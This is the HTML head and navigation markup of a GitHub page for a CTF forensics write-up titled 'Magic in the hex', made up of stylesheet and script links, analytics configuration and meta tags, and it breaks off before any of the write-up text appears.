<link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-fe3f886b577a.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a1dbeda2886c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-1ad5cf51dfeb.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-11d3505dc06a.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-8b800495504f.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-daa38c88b795.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-1b9ea565820a.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-e4be9332dd6c.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-0dcf95848dd5.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-c581c4e461bb.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0e278d45156f.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-dcaf0f44dbb1.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/code-26709f54a08d.css" />
<meta name="optimizely-datafile" content="{"groups": [], "environmentKey": "production", "rollouts": [], "typedAudiences": [], "projectId": "16737760170", "variables": [], "featureFlags": [], "experiments": [], "version": "4", "audiences": [{"conditions": "[\"or\", {\"match\": \"exact\", \"name\": \"$opt_dummy_attribute\", \"type\": \"custom_attribute\", \"value\": \"$opt_dummy_value\"}]", "id": "$opt_dummy_audience", "name": "Optimizely-Generated Audience for Backwards Compatibility"}], "anonymizeIP": true, "sdkKey": "WTc6awnGuYDdG98CYRban", "attributes": [{"id": "16822470375", "key": "user_id"}, {"id": "17143601254", "key": "spammy"}, {"id": "18175660309", "key": "organization_plan"}, {"id": "18813001570", "key": "is_logged_in"}, {"id": "19073851829", "key": "geo"}, {"id": "20175462351", "key": "requestedCurrency"}, {"id": "20785470195", "key": "country_code"}, {"id": "21656311196", "key": "opened_downgrade_dialog"}], "botFiltering": false, "accountId": "16737760170", "events": [{"experimentIds": [], "id": "17911811441", "key": "hydro_click.dashboard.teacher_toolbox_cta"}, {"experimentIds": [], "id": "18124116703", "key": "submit.organizations.complete_sign_up"}, {"experimentIds": [], "id": "18145892387", "key": "no_metric.tracked_outside_of_optimizely"}, {"experimentIds": [], "id": "18178755568", "key": "click.org_onboarding_checklist.add_repo"}, {"experimentIds": [], "id": "18180553241", "key": "submit.repository_imports.create"}, {"experimentIds": [], "id": "18186103728", "key": "click.help.learn_more_about_repository_creation"}, {"experimentIds": [], "id": "18188530140", "key": "test_event"}, {"experimentIds": [], "id": "18191963644", "key": "click.empty_org_repo_cta.transfer_repository"}, {"experimentIds": [], "id": "18195612788", "key": "click.empty_org_repo_cta.import_repository"}, {"experimentIds": [], "id": "18210945499", "key": "click.org_onboarding_checklist.invite_members"}, {"experimentIds": [], "id": "18211063248", "key": "click.empty_org_repo_cta.create_repository"}, {"experimentIds": [], "id": "18215721889", "key": "click.org_onboarding_checklist.update_profile"}, {"experimentIds": [], "id": "18224360785", "key": "click.org_onboarding_checklist.dismiss"}, {"experimentIds": [], "id": "18234832286", "key": "submit.organization_activation.complete"}, {"experimentIds": [], "id": "18252392383", "key": "submit.org_repository.create"}, {"experimentIds": [], "id": "18257551537", "key": "submit.org_member_invitation.create"}, {"experimentIds": [], "id": "18259522260", "key": "submit.organization_profile.update"}, {"experimentIds": [], "id": "18564603625", "key": "view.classroom_select_organization"}, {"experimentIds": [], "id": "18568612016", "key": "click.classroom_sign_in_click"}, {"experimentIds": [], "id": "18572592540", "key": "view.classroom_name"}, {"experimentIds": [], "id": "18574203855", "key": "click.classroom_create_organization"}, {"experimentIds": [], "id": "18582053415", "key": "click.classroom_select_organization"}, {"experimentIds": [], "id": "18589463420", "key": "click.classroom_create_classroom"}, {"experimentIds": [], "id": "18591323364", "key": "click.classroom_create_first_classroom"}, {"experimentIds": [], "id": "18591652321", "key": "click.classroom_grant_access"}, {"experimentIds": [], "id": "18607131425", "key": "view.classroom_creation"}, {"experimentIds": [], "id": "18831680583", "key": "upgrade_account_plan"}, {"experimentIds": [], "id": "19064064515", "key": "click.signup"}, {"experimentIds": [], "id": "19075373687", "key": "click.view_account_billing_page"}, {"experimentIds": [], "id": "19077355841", "key": "click.dismiss_signup_prompt"}, {"experimentIds": [], "id": "19079713938", "key": "click.contact_sales"}, {"experimentIds": [], "id": "19120963070", "key": "click.compare_account_plans"}, {"experimentIds": [], "id": "19151690317", "key": "click.upgrade_account_cta"}, {"experimentIds": [], "id": "19424193129", "key": "click.open_account_switcher"}, {"experimentIds": [], "id": "19520330825", "key": "click.visit_account_profile"}, {"experimentIds": [], "id": "19540970635", "key": "click.switch_account_context"}, {"experimentIds": [], "id": "19730198868", "key": "submit.homepage_signup"}, {"experimentIds": [], "id": "19820830627", "key": "click.homepage_signup"}, {"experimentIds": [], "id": "19988571001", "key": "click.create_enterprise_trial"}, {"experimentIds": [], "id": "20036538294", "key": "click.create_organization_team"}, {"experimentIds": [], "id": "20040653299", "key": "click.input_enterprise_trial_form"}, {"experimentIds": [], "id": "20062030003", "key": "click.continue_with_team"}, {"experimentIds": [], "id": "20068947153", "key": "click.create_organization_free"}, {"experimentIds": [], "id": "20086636658", "key": "click.signup_continue.username"}, {"experimentIds": [], "id": "20091648988", "key": "click.signup_continue.create_account"}, {"experimentIds": [], "id": "20103637615", "key": "click.signup_continue.email"}, {"experimentIds": [], "id": "20111574253", "key": "click.signup_continue.password"}, {"experimentIds": [], "id": "20120044111", "key": "view.pricing_page"}, {"experimentIds": [], "id": "20152062109", "key": "submit.create_account"}, {"experimentIds": [], "id": "20165800992", "key": "submit.upgrade_payment_form"}, {"experimentIds": [], "id": "20171520319", "key": "submit.create_organization"}, {"experimentIds": [], "id": "20222645674", "key": "click.recommended_plan_in_signup.discuss_your_needs"}, {"experimentIds": [], "id": "20227443657", "key": "submit.verify_primary_user_email"}, {"experimentIds": [], "id": "20234607160", "key": "click.recommended_plan_in_signup.try_enterprise"}, {"experimentIds": [], "id": "20238175784", "key": "click.recommended_plan_in_signup.team"}, {"experimentIds": [], "id": "20239847212", "key": "click.recommended_plan_in_signup.continue_free"}, {"experimentIds": [], "id": "20251097193", "key": "recommended_plan"}, {"experimentIds": [], "id": "20438619534", "key": "click.pricing_calculator.1_member"}, {"experimentIds": [], "id": "20456699683", "key": "click.pricing_calculator.15_members"}, {"experimentIds": [], "id": "20467868331", "key": "click.pricing_calculator.10_members"}, {"experimentIds": [], "id": "20476267432", "key": "click.trial_days_remaining"}, {"experimentIds": [], "id": "20476357660", "key": "click.discover_feature"}, {"experimentIds": [], "id": "20479287901", "key": "click.pricing_calculator.custom_members"}, {"experimentIds": [], "id": "20481107083", "key": "click.recommended_plan_in_signup.apply_teacher_benefits"}, {"experimentIds": [], "id": "20483089392", "key": "click.pricing_calculator.5_members"}, {"experimentIds": [], "id": "20484283944", "key": "click.onboarding_task"}, {"experimentIds": [], "id": "20484996281", "key": "click.recommended_plan_in_signup.apply_student_benefits"}, {"experimentIds": [], "id": "20486713726", "key": "click.onboarding_task_breadcrumb"}, {"experimentIds": [], "id": "20490791319", "key": "click.upgrade_to_enterprise"}, {"experimentIds": [], "id": "20491786766", "key": "click.talk_to_us"}, {"experimentIds": [], "id": "20494144087", "key": "click.dismiss_enterprise_trial"}, {"experimentIds": [], "id": "20499722759", "key": "completed_all_tasks"}, {"experimentIds": [], "id": "20500710104", "key": "completed_onboarding_tasks"}, {"experimentIds": [], "id": "20513160672", "key": "click.read_doc"}, {"experimentIds": [], "id": "20516196762", "key": "actions_enabled"}, {"experimentIds": [], "id": "20518980986", "key": "click.dismiss_trial_banner"}, {"experimentIds": [], "id": "20535446721", "key": "click.issue_actions_prompt.dismiss_prompt"}, {"experimentIds": [], "id": "20557002247", "key": "click.issue_actions_prompt.setup_workflow"}, {"experimentIds": [], "id": "20595070227", "key": "click.pull_request_setup_workflow"}, {"experimentIds": [], "id": "20626600314", "key": "click.seats_input"}, {"experimentIds": [], "id": "20642310305", "key": "click.decrease_seats_number"}, {"experimentIds": [], "id": "20662990045", "key": "click.increase_seats_number"}, {"experimentIds": [], "id": "20679620969", "key": "click.public_product_roadmap"}, {"experimentIds": [], "id": "20761240940", "key": "click.dismiss_survey_banner"}, {"experimentIds": [], "id": "20767210721", "key": "click.take_survey"}, {"experimentIds": [], "id": "20795281201", "key": "click.archive_list"}, {"experimentIds": [], "id": "20966790249", "key": "contact_sales.submit"}, {"experimentIds": [], "id": "20996500333", "key": "contact_sales.existing_customer"}, {"experimentIds": [], "id": "20996890162", "key": "contact_sales.blank_message_field"}, {"experimentIds": [], "id": "21000470317", "key": "contact_sales.personal_email"}, {"experimentIds": [], "id": "21002790172", "key": "contact_sales.blank_phone_field"}, {"experimentIds": [], "id": "21354412592", "key": "click.dismiss_create_readme"}, {"experimentIds": [], "id": "21366102546", "key": "click.dismiss_zero_user_content"}, {"experimentIds": [], "id": "21370252505", "key": "account_did_downgrade"}, {"experimentIds": [], "id": "21370840408", "key": "click.cta_create_readme"}, {"experimentIds": [], "id": "21375451068", "key": "click.cta_create_new_repository"}, {"experimentIds": [], "id": "21385390948", "key": "click.zero_user_content"}, {"experimentIds": [], "id": "21467712175", "key": "click.downgrade_keep"}, {"experimentIds": [], "id": "21484112202", "key": "click.downgrade"}, {"experimentIds": [], "id": "21495292213", "key": "click.downgrade_survey_exit"}, {"experimentIds": [], "id": "21508241468", "key": "click.downgrade_survey_submit"}, {"experimentIds": [], "id": "21512030356", "key": "click.downgrade_support"}, {"experimentIds": [], "id": "21539090022", "key": "click.downgrade_exit"}, {"experimentIds": [], "id": "21543640644", "key": "click_fetch_upstream"}, {"experimentIds": [], "id": "21646510300", "key": "click.move_your_work"}, {"experimentIds": [], "id": "21656151116", "key": "click.add_branch_protection_rule"}, {"experimentIds": [], "id": "21663860599", "key": "click.downgrade_dialog_open"}, {"experimentIds": [], "id": "21687860483", "key": "click.learn_about_protected_branches"}, {"experimentIds": [], "id": "21689050333", "key": "click.dismiss_protect_this_branch"}, {"experimentIds": [], "id": "21864370109", "key": "click.sign_in"}], "revision": "1372"}" />
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-774bfe5ae983.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-327bbf-0aaeb22dd2a5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_soft-nav_soft-nav_ts-21fc7a4a0e8f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-e059fd03252f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-2646a2c533e3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-c04540d458d4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-b9368a9cb79e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_fzy_js_index_js-node_modules_github_markdown-toolbar-element_dist_index_js-e3de700a4c9d.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-6afc16-e779583c369f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_text-ex-3415a8-7ecc10fb88d0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-79182d-befd2b2f5880.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_view-components_app_components_primer_primer_js-node_modules_gith-6a1af4-df3bc95b06d3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-fc0e0b89822a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-1641411db24a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-9d9fe1859ce5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-4140d67f0cc2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-424aa982deef.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_hotkey_dist_-9fc4f4-d434ddaf3207.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-35b3ae68c408.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_session-resume_dist-def857-2a32d97c93c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-15ddcc-1512e06cfee0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-430cacb5f7df.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper_ts-app_assets_modules_github_be-f5afdb-8dd5f026c5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-0af96d15a250.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_include-fragment_ts-app_assets_modules_github_behaviors_r-4077b4-75370d1c1705.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-7883159efa9e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-742151da9690.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-32d7d1e94817.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-f5b58d24780b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_optimizely_optimizely-sdk_dist_optimizely_browser_es_min_js-node_modules-3f2a9e-65eee21d1482.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/optimizely-26cee11e2e10.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_template-parts_lib_index_js-58417dae193c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_memoize_dist_esm_index_js-8496b7c4b809.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_mini-throt-a33094-b03defd3289b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_mini-th-85225b-226fc85f9b72.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-7bdefeb88a1a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/repositories-8093725f8825.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_clipboard-copy-element_dist_index_esm_js-node_modules_github_remo-8e6bec-232430bfe6da.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_decorators_js-node_modules_scroll-anchoring_di-e71893-cc1b30c51a28.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_diffs_blob-lines_ts-app_assets_modules_github_diffs_linkable-line-n-f96c66-97aade341120.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/diffs-3a64c1f69a81.js"></script>
<title>CTF-Writeups/Magic in the hex.md at 3dfbfc9f6d536f6f42758da711d280dfe61cf9d2 · palanioffcl/CTF-Writeups · GitHub</title>
<meta name="route-pattern" content="/:user_id/:repository/blob/*name(/*path)">
<meta name="current-catalog-service-hash" content="581425c0eaaa5e5e53c5b736f58a14dbe5d38b0be425901738ad0670bd1d5a33">
<meta name="request-id" content="8928:0F2B:69AEB71:6CA17BB:64121C66" data-pjax-transient="true"/><meta name="html-safe-nonce" content="0588e215c0c76aa9ee329877c5e255ade84b0c2d8de2ce9b03a9b38b8e693762" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiI4OTI4OjBGMkI6NjlBRUI3MTo2Q0ExN0JCOjY0MTIxQzY2IiwidmlzaXRvcl9pZCI6IjQxNjA5NTkwMDk0NjQxMzA2NjIiLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW5kZXIiOiJmcmEifQ==" data-pjax-transient="true"/><meta name="visitor-hmac" content="3e44d8c15001fba460a3f741f87b70b4c1e2414724797aebe55e0a75b85bfe19" data-pjax-transient="true"/>
<meta name="hovercard-subject-tag" content="repository:426049755" data-turbo-transient>
<meta name="github-keyboard-shortcuts" content="repository,source-code,file-tree" data-turbo-transient="true" />
<meta name="selected-link" value="repo_source" data-turbo-transient>
<meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I">
<meta name="octolytics-url" content="https://collector.github.com/github/collect" />
<meta name="analytics-location" content="/<user-name>/<repo-name>/blob/show" data-turbo-transient="true" />
<meta name="user-login" content="">
<meta name="viewport" content="width=device-width"> <meta name="description" content="The Challenges which i solved in various CTFs can be seen here :) - CTF-Writeups/Magic in the hex.md at 3dfbfc9f6d536f6f42758da711d280dfe61cf9d2 · palanioffcl/CTF-Writeups"> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/f7c95df364a3f5d08c61ded109ec3fced5134ab61893e049d19d5447e2d6c36f/palanioffcl/CTF-Writeups" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="CTF-Writeups/Magic in the hex.md at 3dfbfc9f6d536f6f42758da711d280dfe61cf9d2 · palanioffcl/CTF-Writeups" /><meta name="twitter:description" content="The Challenges which i solved in various CTFs can be seen here :) - CTF-Writeups/Magic in the hex.md at 3dfbfc9f6d536f6f42758da711d280dfe61cf9d2 · palanioffcl/CTF-Writeups" /> <meta property="og:image" content="https://opengraph.githubassets.com/f7c95df364a3f5d08c61ded109ec3fced5134ab61893e049d19d5447e2d6c36f/palanioffcl/CTF-Writeups" /><meta property="og:image:alt" content="The Challenges which i solved in various CTFs can be seen here :) - CTF-Writeups/Magic in the hex.md at 3dfbfc9f6d536f6f42758da711d280dfe61cf9d2 · palanioffcl/CTF-Writeups" /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="CTF-Writeups/Magic in the hex.md at 3dfbfc9f6d536f6f42758da711d280dfe61cf9d2 · palanioffcl/CTF-Writeups" /><meta property="og:url" content="https://github.com/palanioffcl/CTF-Writeups" /><meta property="og:description" content="The Challenges which i solved in various CTFs can be seen here :) - CTF-Writeups/Magic in the hex.md at 3dfbfc9f6d536f6f42758da711d280dfe61cf9d2 · palanioffcl/CTF-Writeups" /> <link rel="assets" href="https://github.githubassets.com/">
<meta name="hostname" content="github.com">
<meta name="expected-hostname" content="github.com">
<meta name="enabled-features" content="TURBO_EXPERIMENT_RISKY,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS">
<meta http-equiv="x-pjax-version" content="ef97471de14f8d2285f0269e8f0f7dc70845f693d3f6ccd2dd2daae5cd1bbebe" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="2a84822a832da97f1ea76cf989a357ec70c85713a2fd8f14c8421b76bbffe38c" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="adfc12179419e463f9f320d07920b1684c9b7e060d4d9cd3a6cd5d0de37ce710" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="711646ae23abb27cf728346f30f81c042d4428233a0795acf0e21ed664fe9d94" data-turbo-track="reload">
<meta name="turbo-cache-control" content="no-preview" data-turbo-transient="">
<meta data-hydrostats="publish">
<meta name="go-import" content="github.com/palanioffcl/CTF-Writeups git https://github.com/palanioffcl/CTF-Writeups.git">
<meta name="octolytics-dimension-user_id" content="84482008" /><meta name="octolytics-dimension-user_login" content="palanioffcl" /><meta name="octolytics-dimension-repository_id" content="426049755" /><meta name="octolytics-dimension-repository_nwo" content="palanioffcl/CTF-Writeups" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="426049755" /><meta name="octolytics-dimension-repository_network_root_nwo" content="palanioffcl/CTF-Writeups" />
<link rel="canonical" href="https://github.com/palanioffcl/CTF-Writeups/blob/3dfbfc9f6d536f6f42758da711d280dfe61cf9d2/Meta%20games%20CTF%202021/Forensics/Magic%20in%20the%20hex.md" data-turbo-transient> <meta name="turbo-body-classes" content="logged-out env-production page-responsive page-blob">
<meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">
<meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">
<meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors">
<link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg">
<meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" />
<link rel="manifest" href="/manifest.json" crossOrigin="use-credentials">
</head>
<body class="logged-out env-production page-responsive page-blob" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out env-production page-responsive page-blob" style="word-wrap: break-word;">
<div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-04fa93bb158a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-9920eaa99f50.js"></script><header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner"> <button type="button" class="Header-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span>Toggle navigation</span> </button>
<div class="container-xl d-flex flex-column flex-lg-row flex-items-center p-responsive height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg>
<div class="flex-1"> Sign up </div>
<div class="flex-1 flex-order-2 text-right"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span> <span><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span></button> </div> </div>
<div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0"> <div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0"> <nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex dropdown-menu-wide">
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path></svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div>
